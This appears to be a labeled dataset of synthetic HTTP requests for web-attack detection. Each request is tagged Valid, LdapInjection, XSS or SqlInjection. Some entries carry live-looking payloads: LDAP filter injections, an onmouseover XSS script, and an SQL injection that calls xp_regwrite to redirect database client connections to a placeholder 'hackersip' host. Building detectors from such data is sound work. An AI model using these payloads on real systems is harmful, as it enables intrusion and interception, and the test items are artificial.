X-Serial-Number: 35178476793
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22296
Start - Id: 11987
class: Valid
GET /eFa7u-/o5r/nv7Do/f8g1WAjTzuWU/4byh5r9t/e-H5dVONKzgZwF.gtZwF/dpLAIrMYakf.cgi? HTTP/1.1
Host: www.v2zth.cz
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: windows-1250;q=0.2, x-mac-ce;q=0.9, utf-7;q=0.3
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 201.224.46.9
Cookie: VNV.fxvopenqxlike=919112;lxs3oL=wR;sOeu7QncBhI=6549050;tb3cis1etsevuse=10961
Cookie2: $Version="042"
Date: Fri, 20 Nov 09 23:32:17 CET
ETag: "azk_rN20wtoPDiQA8P"
Expect: tucTehl
From: heeltin@ed0ee3i7c.fr
If-Modified-Since: Mon, 26 Jun 06 14:41:26 UTC
If-Unmodified-Since: Mon, 26 Sep 05 24:23:03 CET
If-Match: "xMW0st63L3-kMmVRZk"
If-None-Match: "PRGTjcPVB_fvrn5N3Vd2"
If-Range: Wed, 17 Mar 10 24:37:15 GMT
Max-Forwards: 7305
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Basic bnRlaTpFcjBiY2k=
Authorization: htmn wHgretPd=ndtwt
Range: 9-,78403-
Referer: /3mod.rar
TE: trailers
Trailer: User-Agent
User-Agent: ErerasmwtwdxqwcopEae
UA-CPU: MIPS
UA-Disp: 833,846,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 630x5808
Via: 3.1 www.sssbKag.png, 7amebn/0.6 182.34.203.130, sa8Ooe/8.1 200.156.69.212
Transfer-Encoding: compress
Upgrade: r9sP/4.2, ek3c/8.3, hde/4.8, hcnli/4.1, mt9/7.2
Warning: 288 117.157.147.158 "gu0mstndewn" "Wed, 10 Dec 08 23:14:10 CET"
X-Forwarded-For: 239.127.131.42
X-Serial-Number: 670096035438562
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11987
Start - Id: 37980
class: LdapInjection
GET /DbO0jaFssWdnsamv/0Phttphen6npzVsg/i_CZShUKJ/aMkPY/etdapn4oe1ap4W8earan/s4cZbDloed/o.1dC4v4Z2Pnfwa/k56p.9nQOvq/nZDl_T8elv3F.aspx?9jfotraNreby=063385&z26otitidiad=eoFt%40eUx&I@YLS_XIY=hiOa&ae5=ctgtaOestfez5ir&aovi1odq4rNa=r9KC&PlIVwRjI=1&vnbEei=e+ss9&nf=4iwCceasSe4auqaa0&6eh0s8gxaeo=fbBlsY_3&0tVPWZi4=0557%29%28%26%28objectClass%3Dodm%29%28%7C%28sn%3D++led%29%28cn%3DYth+++J*%29%29&aty4hm4a=+g&nn3k6son=idieesplblE&un=zieldpblitNlfo&tdlIizlbviq=346&dhoYeesys=i%2Brzrt HTTP/1.0
Host: www.scnhthia.biz
Connection: keep-alive
Accept: application/*;q=0.5, video/mpeg
Accept-Charset: x-mac-chinesetrad;q=0.4, x-mac-ce, windows-1254, iso-2022-jp;q=0.0
Accept-Encoding: identity;q=0.8, identity, identity, compress;q=0.4, identity
Accept-Language: *
Cache-Control: max-stale
Client-ip: 4.162.83.225
Cookie: iwlrn=?hAri;tDmmua8gxm=fEea
Cookie2: $Version="64"
Date: Sun, 23 Mar 08 12:36:58 GMT
ETag: W/"f@fO0MyLgdLSoe3VulIJ"
Expect: 100-continue
From: ismia@jutuoqaes.be
If-Modified-Since: Thu, 27 Aug 09 11:37:43 GMT
If-Unmodified-Since: Fri, 09 May 08 17:48:02 UTC
If-Match: *
If-None-Match: "a@_HTqFvcWL96WG"
If-Range: Mon, 13 Jul 09 21:45:24 UTC
Max-Forwards: 41
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Digest response="Dbd2EEdfF8FAEeFcAac9e11e54251C0d"
Range: 4893-,-7197
Referer: http://www.nNece.net/ehhts/anRk/ei9Hweo/dncm1iS.aspx
TE: trailers
Trailer: Warning
User-Agent: Mozilla/6.3 (Windows; U; Win98 6.8; td-it; rv:5.6.6) Gecko/11801046
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 8848x2681
Via: HTTP/1.9 www.ltTe.css:8239, 4.8 www.e7hr.jpg, ck9o/7.0 125.0.154.24
Transfer-Encoding: deflate
Upgrade: ieu/6.3
Warning: 489 www.OrprSscd.gif "nuIoc" "Wed, 01 Aug 07 18:56:21 GMT"
X-Forwarded-For: 59.231.233.194
X-Serial-Number: 800649
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37980
Start - Id: 12255
class: Valid
GET /tyMxpj1.dtK-BiSNX_1h/fmWH7N4DcBY/ms8npO/c60aviN5/hp/ebwyLaRoLn5xpExBS/us4KmIJw3HyBd/1W_TyvQhryZaWC/t7in4r9olsx4muora/soeerot0dhrest/jpgqmfs@sjb.png?ixa5sD1mnba9n=eOnheyvtwCs&ObXor@oxTja71=4619966865&eiayiisii9Eet=07&nihaceIbes=aswTdt7ibdewpitEsn&Rnot2n4i2de=%7E&Ttoirr5I1=nzL3WrqIEPd&Qneal9t=654437659&MNnihtl=oeu3Y4&ogE4QapT=egbsnccrgh&ae=divtloo&nsdo0eooA8iy=0%26e%406arenodeat&kPh0oqvirof5h=f%7C6 HTTP/1.1
Host: www.u2uo.gov:6
Connection: frhoh
Accept: audio/basic;q=0.7, application/rtf;q=0.8, video/quicktime
Accept-Charset: *;q=0.9
Accept-Encoding: compress;q=0.4, identity
Accept-Language: jeddwT3-naduin;q=0.5, rrsr-r, 0-slv;q=0.7, h4hmcot-e2b8;q=0.4, Meaeeo-xI4EsAm;q=0.5
Cache-Control: max-stale=73023
Client-ip: 177.239.33.200
Cookie: crernunEaeh=1oroo;ereagsstidlc=iM-_794;FgRQJog=45346785;sd4E=eUP9Q;Eeqr=v9D;2la=x8vorilikeweir
Cookie2: $Version="852"
Date: Mon, 25 Feb 08 20:25:41 CET
ETag: W/"aQXlaLl7y_g@Qff4wM"
Expect: tamerp2K=5twie4
From: tRmfo@Moomaa.cz
If-Modified-Since: Thu, 21 May 09 11:35:29 CET
If-Unmodified-Since: Mon, 06 Feb 06 03:51:51 GMT
If-Match: "ryrsy0VxIaVQ375KMP8"
If-None-Match: *
If-Range: Mon, 16 Nov 09 02:43:36 CET
Max-Forwards: 5
MIME-Version: 1.6
Pragma: nttio=Rv3q9eE
Proxy-Authorization: NTLM ZG50dHJ2ZGhhaWF1ZWFiZG5Jd3Bhc2VPb1R3aGNub2VuYXNvRWlkbHJ3Y3NucA==
Authorization: Basic NG1jeG9yOmFzcjNzNGo=
Range: 59-,042414-38,-0351
Referer: /6rcsaes/7wrnZy/sdwp6/3Wncns/wkhee.jsp
TE: chunked;q=0.1,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/8.9 (X11; U; Open BSD i586 0.1; cn-xn; rv:4.3.9) Gecko/63626845
UA-CPU: Sparc
UA-Disp: 689,5553,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 7901x792
Via: 7.9 www.etde.shtml:10
Transfer-Encoding: compress
Upgrade: are/3.5, nrPtg/9.5, rewld/9.8, asadg/3.5, doH/5.9
Warning: 801 56.160.18.152 "x1hi" "Mon, 01 Dec 08 03:48:59 UTC"
X-Forwarded-For: 93.31.136.215
X-Serial-Number: 8899123917889
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12255
Start - Id: 2889
class: Valid
GET /l7BK3JMKzYY1pG.cgi?or472idhoDihoa=Ues9ane%5D&eMl43eonoNe=63743032&a1lu=843560&aehg=GtwRnucea3kadminm5 HTTP/1.1
Host: 13.156.113.48
Connection: close
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: riT0sf=5n3h7SAt
Client-ip: 12.8.60.251
Cookie: le=@ama90gloygs;cn6deleteifBII=t6BYjldS1M;oelrilonenIal=Yesier;D1eo=35240868;l6t51pxreaaaLst=03995046;moSonTi=tOosahtDmoteifdc
Cookie2: $Version="464"
Date: Wed, 23 Dec 09 11:33:03 GMT
ETag: "HGCRwrrbAwb_eETJd"
Expect: acyf4r=ebfbsh;Ospodc
From: thiar@hoemEai.ch
If-Modified-Since: Thu, 19 Jan 06 04:49:27 CET
If-Unmodified-Since: Sat, 25 Jun 05 13:30:43 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 28 May 06 21:33:19 CET
Max-Forwards: 2
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: qsge uxna2zu=krees
Authorization: Digest username="Ntiu2a8i"
Range: 11041-66738
Referer: http://www.inuGe.it/paefaa/dpy4d/08aa.cfm
TE: chunked;q=0.2
Trailer: Expect
User-Agent: Mozilla/5.5 (X11; U; Linux i586 0.9; le-ey; rv:3.4.3) Gecko/31085475
UA-CPU: Sparc
UA-Disp: 7777,5626,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 640x6169
Via: 1.2 www.mehwdr.css, 6.5 www.ie3soe.jpeg, FTP/9.6 www.mtneit.gif
Transfer-Encoding: identity
Upgrade: 7I07i/0.7, ri7He/2.5
Warning: 969 www.nthaNniO.tiff "euint3iarnws" "Sat, 08 Aug 09 16:51:19 GMT"
X-Forwarded-For: 160.9.8.226
X-Serial-Number: 440914790634409640
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2889
Start - Id: 47284
class: XSS
GET /5eeetmnnc5taEyse.js?g6bqegsno=salBfeehee&YcCviD5=Hoq8ea2jfoh&soecEfttnTdmee=e&r2ir65hders=%3Cdiv+++onmouseover+++%3D+++%22+++++%5Balert++%28%27r28Vq%27%29%3B%5D++%22++++%3E&ET3MzQ=e&vdE9lhr5T5ENt=c&7rdiads=pYIY HTTP/1.0
Host: www.sF1aAsb4r.biz
Connection: lamenid
Accept: image/*;q=0.7, video/*, audio/basic
Accept-Charset: euc-kr
Accept-Encoding: gzip;q=0.0, deflate, compress;q=0.0, gzip, gzip;q=0.6
Accept-Language: oa-trddikV, a-ph, 99s7yo-t
Cache-Control: no-cache
Client-ip: 150.123.138.85
Cookie: ri=01304683;ttl1usn=0;mm=wCXNX_jd95;ed= ir;hdn=caati;Lole6=is%
Cookie2: $Version="26"
Date: Mon, 29 May 06 10:36:00 GMT
ETag: "czJyaTq7@vJjs.KcRANI"
Expect: 100-continue
From: peTeu9@mayraae.fr
If-Modified-Since: Sun, 12 Oct 08 06:14:27 GMT
If-Unmodified-Since: Fri, 24 Jun 05 24:07:31 CET
If-Match: "WrKP27J.hjXxkUaeMc"
If-None-Match: "jhav@snYxsBoqBJs8YJ"
If-Range: *
Max-Forwards: 0273
MIME-Version: 2.6
Pragma: esn1tep='xsaha'
Proxy-Authorization: elWea ara5=ThudDeet
Authorization: Digest response="A7BB157Bcc54feF1FDD2ccAbdeeDadB0"
Range: -4,7256-5,39-5314
Referer: /i0le/ethe.dll
TE: deflate
Trailer: Accept-Encoding
User-Agent: dJbkFS7Qq http://www.snbo.ch
UA-CPU: x86
UA-Disp: 3073,5344,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 5730x315
Via: 0.1 75.95.34.184:322
Transfer-Encoding: identity
Upgrade: mtnf/1.5
Warning: 047 125.243.221.59 "FolaPnotvWe1rchha" 
X-Forwarded-For: 135.30.4.5
X-Serial-Number: 19525614371
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47284
Start - Id: 29190
class: Valid
GET /OH.tZsOMg6/ensaeY9rmlnSt/s_PiFEttKq0@5uUppnnj/at/Gnusdszifre/bnsskke/8yHpIJgPl/48uWU2HF69MpL1p.msf?miiThlaUh9e=coto0ntiv3&smthld2RhA9=4z%40uh&kdeiec8ola=64&aeepon7=oersusNnullhfmseav+tewn HTTP/1.0
Host: 255.9.215.55
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 214.155.190.210
Cookie: Ce=tmsi3cyktheeea;dlthnhHw=nrpacsls;lZIJpeLpslvT=avb7
Cookie2: $Version="44"
Date: Sat, 20 Mar 04 15:13:02 CET
ETag: "@ZMD3ZRb6Wv2eBkl@wjw"
Expect: xmilS
From: 4otngeu@itoo.net
If-Modified-Since: Wed, 29 Sep 04 20:58:03 UTC
If-Unmodified-Since: Wed, 05 Nov 08 05:14:53 GMT
If-Match: "erVndPXes.pRTv7M"
If-None-Match: *
If-Range: Sun, 12 Mar 06 11:32:53 UTC
Max-Forwards: 979
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: Digest nc=90f0EcDe
Authorization: mKbd hnhb11on=erteoe
Range: -4
Referer: /alqbu0/stooz/whdsbxxm/feskr/eUth.gif
TE: trailers,trailers,trailers
Trailer: Authorization
User-Agent: hjomMhOE.@ http://www.tcsTr.biz
UA-CPU: PowerPC
UA-Disp: 0631,129,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 944x565
Via: iobaCo/4.9 www.tuf4s.tiff
Transfer-Encoding: htvsne; tDqwoBrt=rtislii
Upgrade: itc/2.5
Warning: 168 www.escbxam.tiff "8trlaregto" "Sat, 10 Nov 07 11:09:25 UTC"
X-Forwarded-For: 44.32.231.105
X-Serial-Number: 4041973045614
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29190
Start - Id: 31407
class: Valid
GET /iE6fI5fC/bnPgsLrmbetweenstyle/dySrWjTnai/YqB2gWm/lIHPhpRsqRp/ptUN0erceNznb/wne/ioRl4ixp.htm?Ngsuioodorw1sil=y+&fden=0fniarl8&itniE9swt=xralleepR&eeenSe=tKm6&8imwwonbumvmr=r3nielHui8u%7Csue&ei5i=+srmRNcAt%5BsNB&8x5uealS=t4d81F-QEQ8e&ej9barhd=ariocRiefi0nlae&snqceogyA4ye=mainputrm&Eziaaary1Cii=367&erod=sd2+&wfwf=d3sock_streamte+ngy1o&8eAedeDr=%5Cs%26e HTTP/1.1
Host: 197.138.205.148:80
Connection: keep-alive
Accept: image/gif;q=0.2
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: r-Yyee;q=0.8, qIgtnsi-0nar6d
Cache-Control: max-age=79754
Client-ip: 94.233.71.72
Cookie: dtos73r=9;teAhtttpbdr=t6i;0olszdi8ens=2161;oenos=e5eer;eeafSiropfiacwd=fskntgodslierinpes;b4gTr=3028557
Cookie2: $Version="46"
Date: Thu, 05 Feb 04 11:08:03 UTC
ETag: "MVtyvOfwt3vQ32x"
Expect: 100-continue
From: Tzeuatea@eoges.de
If-Modified-Since: Sat, 12 Aug 06 09:09:33 UTC
If-Unmodified-Since: Wed, 26 Sep 07 11:39:34 UTC
If-Match: "8iMl4HlzQS3SUDW12koi"
If-None-Match: "vHdhiESwARVeSX8h7e"
If-Range: Fri, 25 Dec 09 17:58:12 UTC
Max-Forwards: 3
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Basic aWhud3Rnb2E6YUVJb2VOYjE=
Authorization: NTLM MHBVRWU4dXl1aXR0b3R0a3l1Z2VoZXBlaGFDdnM4ZWxodHBJaWhpRHZtaG10
Range: -6182,52054-760058,9-
Referer: http://www.wua1h.com/baEAv/joofmjr/gkg2de.jsp
TE: deflate;q=0.0,trailers
Trailer: Via
User-Agent: Mozilla/7.3 (Machintosh; U; PPC Mac OS X 1.5; ch-tC; rv:0.6.6) Gecko/06715534
UA-CPU: Sparc
UA-Disp: 670,858,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 2355x254
Via: HTTP/5.4 www.Ntui.tiff, 3.9 www.eIloH.jpg
Transfer-Encoding: deflate
Upgrade: eiKz/4.5, tfe/0.1, nnhn/4.9, fptn/7.8, iuaOf/8.9
Warning: 388 www.tfrat7d.jpeg:096 "hrsa7mrlleyurua" "Tue, 09 Mar 10 03:42:13 CET"
X-Forwarded-For: 160.213.53.125
X-Serial-Number: 886445544
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 31407
Start - Id: 20877
class: Valid
GET /nnwhesstosaansrh/VQhvR9hbinSt@G/oQH.jA4EcBkxgU/kdOucxlcece3ogea/YrLdLsueeq3/fwRS7ZpV3G9.shtml?rnpa1touuim=72259&oascgelur=0tuEesahoslEf&4iuttneuoaEe=%2Fe&ctt=reTabi+u&aHAadzh9e=76958&wrbG0aQboi@=eQAD&Vt8dbdpS7=64866402&oheh5Bodni9Re6a=ezJ52yWY9&lsg4Waeroni=AtukheLrenf1tt5odk&eou9icco=arqrt&taihm=3&trrohnnoLsiadl=21&jaih=8mi&oHpj=492587211 HTTP/1.0
Host: 86.162.72.161:80
Connection: eccmtj
Accept: audio/*;q=0.3, image/*;q=0.3, audio/*;q=0.0
Accept-Charset: iso-8859-7, windows-1258
Accept-Encoding: 
Accept-Language: feaoa-tss
Cache-Control: no-store
Client-ip: 188.162.242.211
Cookie: 9TbNuaxrtn3ss=517;50mowueu=6 es noBt:huetiae9;JHy90=]bineftaSUs% ltVp;alt=172;N7sepWyheeu1z=4;oahM66a=i
Cookie2: $Version="317"
Date: Sat, 28 May 05 06:55:55 UTC
ETag: W/"6Zfr8mlm3ZhdZvUY1"
Expect: ef4mTus
From: 3llAde@ardeO.st
If-Modified-Since: Wed, 18 Feb 09 20:17:33 UTC
If-Unmodified-Since: Thu, 03 Nov 05 22:04:09 CET
If-Match: "O6f_5pdts8uxED0Af9P"
If-None-Match: "fuvuxn2r0qShyRkfVW_"
If-Range: Thu, 14 Oct 04 05:14:31 UTC
Max-Forwards: 7
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Digest nc=DeFA0D0a
Authorization: NTLM bm5ydHllZHVpcjFSbW9wZXB0UmN4N3JmbmptYnRlaEVuSG5uYWhlZjBjaXg=
Range: 90-96,-579803,-6
Referer: http://www.vhamEhe.ch/chgag.shtml
TE: chunked;q=0.8,gzip;q=0.8
Trailer: If-Modified-Since
User-Agent: Mozilla/4.3 (Windows; U; Windows NT 4.2; ld-im; rv:0.4.7) Gecko/63281810
UA-CPU: 68000
UA-Disp: 743,400,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 0585x0395
Via: HTTP/3.8 www.8aot.gif, 2.9 www.tsihnais.css:75, seh/4.8 216.119.107.89
Transfer-Encoding: gzip
Upgrade: l2sonl/9.3, rwue/0.0
Warning: 436 135.104.177.87:1264 "dhiTIi5ayllgdbbitob" 
X-Forwarded-For: 183.219.223.187
X-Serial-Number: 390733
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20877
Start - Id: 24708
class: Valid
GET /esroe1iaelanmL6Vob/hot/ilw/ctooszAtwf3cn4LwH/kntCuisgn6lm/repadothtnxwstc7r/i0eiNrineinrUubttc0/vg.JUJJJ/q9YyzEHDqj/aNDZ7rn@Z/ncGhttpsoyxtermzmyDo7I.php?nom=ybasetifmnitjui&t2i3Mfdinaoom=tfhLtGz&rkt5Gii=178746&rtsouaysI6t=52309&ss6tye6elesMe=tic7r96bm%3F&Teti=i8gtoT&igtbrcttkheStt=8n&TGETt_CKOq=lyr0o%29i&zY4r.RXVZh@.=5542519&ttamrryfeteiz=5 HTTP/1.1
Host: www.tore.gov:969
Connection: eLteorms
Accept: */*
Accept-Charset: x-mac-korean, iso-8859-5, windows-1258, euc-jp;q=0.0
Accept-Encoding: compress, deflate, deflate, gzip
Accept-Language: l5-nlhsnc5p, 7rfaAst-tmddbsu, l2m-cga, c3oPD-Hwqmmrm;q=0.3, asesye-incaiia;q=0.4
Cache-Control: no-transform
Client-ip: 246.244.195.20
Cookie: nbne6=rchhomeU;ecnPvu1rAmts=t&i;yv9llhgt3rteaib=t74FdDb;8oct=i7peOservicesA
Cookie2: $Version="7"
Date: Wed, 05 Oct 05 20:42:58 UTC
ETag: "t@IVI2TA3htbcl8FxPh"
Expect: 100-continue
From: ntYeba@oeusnh4l9.net
If-Modified-Since: Mon, 08 Mar 10 03:42:08 UTC
If-Unmodified-Since: Thu, 06 Nov 08 08:48:33 GMT
If-Match: "Lv90q@RbxtG4MeZGMVr"
If-None-Match: *
If-Range: Fri, 09 Jul 04 14:22:43 CET
Max-Forwards: 791
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: NTLM YWJvdG5vbHJzdHNlbXJvZmlldTJkT2VnYWRSc1B5bzdlaWJodGNy
Authorization: NTLM d3JhcmVnclJYMXdjcmJhczNjcnFyZWx2aW53SHNzaGQ5ZXBtbDM=
Range: 3-
Referer: http://raaw.ch/5r4eoi/ihea/7Hca0Eh.php4
TE: trailers
Trailer: Date
User-Agent: nSEOSv http://www.amiwse.uk
UA-CPU: PowerPC
UA-Disp: 9340,8339,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 291x803
Via: HTTP/7.6 www.lEil4.js:521, FTP/3.8 www.itWsgdt.html
Transfer-Encoding: l9uth; w0net=6mu7mea7
Upgrade: noohwb/5.0
Warning: 540 44.10.123.96:4 "peien0ehi" 
X-Forwarded-For: 127.43.236.207
X-Serial-Number: 7759023411175915
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24708
Start - Id: 22775
class: Valid
GET /emkOim2hhZG/bZvtIeimopl1geeb.gif?dBID=31033&nseekhinis=ws8&3lo7oc=Pdt67&Na=euiacaowytrsdh&F8MsZi=19&nhz9ha8asd3anhh=na&ioa2nwzD0eti=17900&ds=do%3En3%3Eklocationpeqi&Jpqopen4fNg=9260305&oahse3nusr=mr&5kvwinnt=ec+selectn&umtloltikqi1=685&htxorolosCbnf=07711&mFyjsEpQMl=%3Eht&AU2LJOk9Sinclude=owgH HTTP/1.0
Host: 184.55.174.206:80
Connection: close
Accept: text/html;q=0.7, audio/*;q=0.5, application/*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 111.76.241.226
Cookie: awzffjwN5nog82x=epstmp;wz=aC7;exaortH=een;Et6=i3W3JklKI-ek;at34rm9=he 3tregh28leit;aaetmbqiz=Ai<
Cookie2: $Version="37"
Date: Tue, 30 Jun 09 01:18:22 UTC
ETag: "koXigvcjUzSB2K0yR2"
Expect: A3ioh7yr=n5gecol;lmo0aaqh=amaurO
From: labOkeyp@Tmrr6ene.de
If-Modified-Since: Sat, 09 Feb 08 13:23:20 GMT
If-Unmodified-Since: Tue, 26 Feb 08 19:38:20 UTC
If-Match: "eU10d3CnSWX63hZSreY_"
If-None-Match: "B1wlnq@SK5sh3Cn_U0"
If-Range: "ST.k._IRuQBZ0tF"
Max-Forwards: 4325
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Digest qop=grcer75h
Authorization: Digest nonce
Range: 34-,77353-25473,-559
Referer: /aet6s.bin
TE: trailers
Trailer: Authorization
User-Agent: ae8rutn/3.7
UA-CPU: 68000
UA-Disp: 9973,4219,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 396x8159
Via: 0.9 www.exoT.css
Transfer-Encoding: compress
Upgrade: zuf/1.3, ons/6.0, ctn/4.8
Warning: 293 www.trmrle.htm "kaAne" 
X-Forwarded-For: 147.118.27.36
X-Serial-Number: 058187169230158
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 22775
Start - Id: 37642
class: LdapInjection
POST /esxao3fnxleuis/Qy9s/n.kmcVown/vuhuascptlFctaerxG/DvNhbrfAuzea7r/5XI0a3thdD38vyH/RvmSvat.js? HTTP/1.0
Content-Length: 130
Content-Language: cpms
Content-Encoding: identity
Content-Location: http://www.hdnxaiqc.ch/uyhE.mspx
Content-MD5: d3N1bnRld251c2djMGVhbw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 13 Nov 04 13:53:15 GMT
Last-Modified: Tue, 14 Nov 06 20:10:59 GMT
Host: 16.36.100.87
Connection: close
Accept: audio/*;q=0.9, video/quicktime, image/png;q=0.9
Accept-Charset: utf-7, iso-8859-4, iso-8859-2;q=0.1, euc-cn, utf-7;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 76.236.29.239
Cookie: M13optQObIn=71887;2Txa=acs;M8vyoaaE1t=HT~c;thewti=ohsa4sNa-xehda;jxaD=3
Cookie2: $Version="55"
Date: Mon, 15 Oct 07 22:28:16 CET
ETag: "oj5Qe7MEf.fDr8DX"
Expect: nuie
From: yhSsf@ahrg7dbN.com
If-Modified-Since: Tue, 30 Jan 07 21:34:52 GMT
If-Unmodified-Since: Tue, 09 Mar 10 12:16:46 UTC
If-Match: "@l6I15syWjZBLMLi"
If-None-Match: *
If-Range: "ZTQa24puzQQdoUrESHV"
Max-Forwards: 85
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: NTLM dDlhZXU1bWRlZWFhZWV3YXI1eXNlTHBvb3h1b2h0b3QyZXNJb29sZQ==
Authorization: Digest algorithm=mRsj
Range: 7-75,773-,28-851
Referer: /wesn9ddw/b2tndal/zudi/iuao9.exe
TE: trailers,chunked;q=0.5
Trailer: If-Modified-Since
User-Agent: Mozilla/7.2 (X11; U; Open BSD i586 7.1; ia-oX; rv:8.2.1) Gecko/39966654
UA-CPU: MIPS
UA-Disp: 8272,2255,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 940x1719
Via: gda/5.8 249.207.108.174, 2.6 152.126.196.113, rwscO/4.8 169.132.87.134
Transfer-Encoding: identity
Upgrade: 1obltA/1.6, begaf/4.9, aje/5.5
Warning: 290 www.csV7.jpg "alupzEldm3wn" 
X-Forwarded-For: 128.30.229.67
X-Serial-Number: 890650544330146
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

TdOdr4cdeeaCe=hmkhwtuehF&gj=neh)(&(objectClass  = we3M*)&rhei=9743529722&trraH=iotfmae o&ttednt9rA=tso&wtedOs=65213329

End - Id: 37642
Start - Id: 34721
class: Valid
PUT /k1acG0_6GW/tHDhfrqDr/mphcaerhurthen6/aiFChyoOiVutR8d5TXc/VPYhavingAbOLghYyGh9/n1-TIPiN/marThftc5/mS_A/8Ljt0z.tiff? HTTP/1.0
Content-Length: 46
Content-Language: pqss
Content-Encoding: gzip
Content-Location: http://Oueadq.ch/ogcPtgi/gonis/iaBrhe/1e8ePaah/jraw.doc
Content-MD5: aXd0c2l0bm9zdGRmdmVhUw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 12 Aug 06 11:48:24 UTC
Last-Modified: Thu, 30 Dec 04 15:02:51 UTC
Host: www.abyEssiAtW.st:80
Connection: tcrgla
Accept: application/x-tar;q=0.9, video/*;q=0.6, audio/basic
Accept-Charset: *
Accept-Encoding: gzip;q=0.8, deflate;q=0.0
Accept-Language: arihthl-Onpmsem9;q=0.8, Msitni0e-cb, AoarY-f;q=0.1, iueuEqta-eueb;q=0.2, 1or1or2-Ws;q=0.5
Cache-Control: no-store
Client-ip: 51.127.174.180
Cookie: 9e7elem64ix1r9t= 7ln zooejc;dd=rh=p[Qesrer;ut8ayHwnF7eor=e);osP=konquRz
Cookie2: $Version="53"
Date: Sun, 06 Dec 09 11:10:13 CET
ETag: "ghddgygvcZw2JBfz"
Expect: ekhewk=nqemtdca
From: tta1oTo@Tdedrs.biz
If-Modified-Since: Mon, 05 Jan 09 19:38:12 UTC
If-Unmodified-Since: Fri, 22 Oct 04 23:41:43 CET
If-Match: *
If-None-Match: "KPXWTLm1-cT8I6K"
If-Range: Sat, 14 Mar 09 13:00:39 GMT
Max-Forwards: 01
MIME-Version: 5.6
Pragma: d='esh0is'
Proxy-Authorization: Basic bmlHR3BwOm9XbW1NZ28=
Authorization: y3qyv pomge=ncjela
Range: 27601-82680,576792-311040,-975285
Referer: http://www.t8qh.uk/e0rEqts6/iimk/N7loyjE.zip
TE: trailers,gzip
Trailer: Accept-Charset
User-Agent: u4eaao (d38eJor; rSabibLl)
UA-CPU: x86
UA-Disp: 550,4531,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 420x8395
Via: FTP/2.5 75.37.205.112:92836
Transfer-Encoding: compress
Upgrade: btCas3/7.1
Warning: 270 www.akhXhs.js "ogdA" "Wed, 23 Dec 09 01:56:59 UTC"
X-Forwarded-For: 102.210.121.17
X-Serial-Number: 58172137914902284
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hrEeawte=ncre&htrmtLaaMhv=D ida%rec3a)>-

End - Id: 34721
Start - Id: 41066
class: SqlInjection
GET /RapL063UPtmp8Tlnode/oacnMzs6fJStfah/jnsOimsysctmex/brmaFgyenoedaAer/rThxm3Lxr/vjBRxI/eUD_/iAK4p9w/pY5M.dll?cmfs8ou=2n&ateM=07&ss=ry&omtresf=jC2X0IP&hw8bsSitslel=Ko+%25u%5D&aoNecbehw=akVUMs&1RdXb@BhavingAYEe=er8wCA&daoyvwSst4nlf=xtermst%3Ce4y+%243rsd-tj+to&loofitvdemGIrcT=385&la=nOZDVJ9kB&DeedRceta4fhOe=201404&wl=l8e74h&dhRehToRaxi=n5%3B&nph-QmtBE=exec++++xp_regwrite+%27HKEY_LOCAL_MACHINE%27%2C%27SOFTWARE%5CMicrosoft%5CMSSQLServer%5CClient%5CConnectTo%27%2C%27sn%27%2C%27REG_SZ%27%2C%27DBMSSOCN%2Chackersip%2C80%27 HTTP/1.1
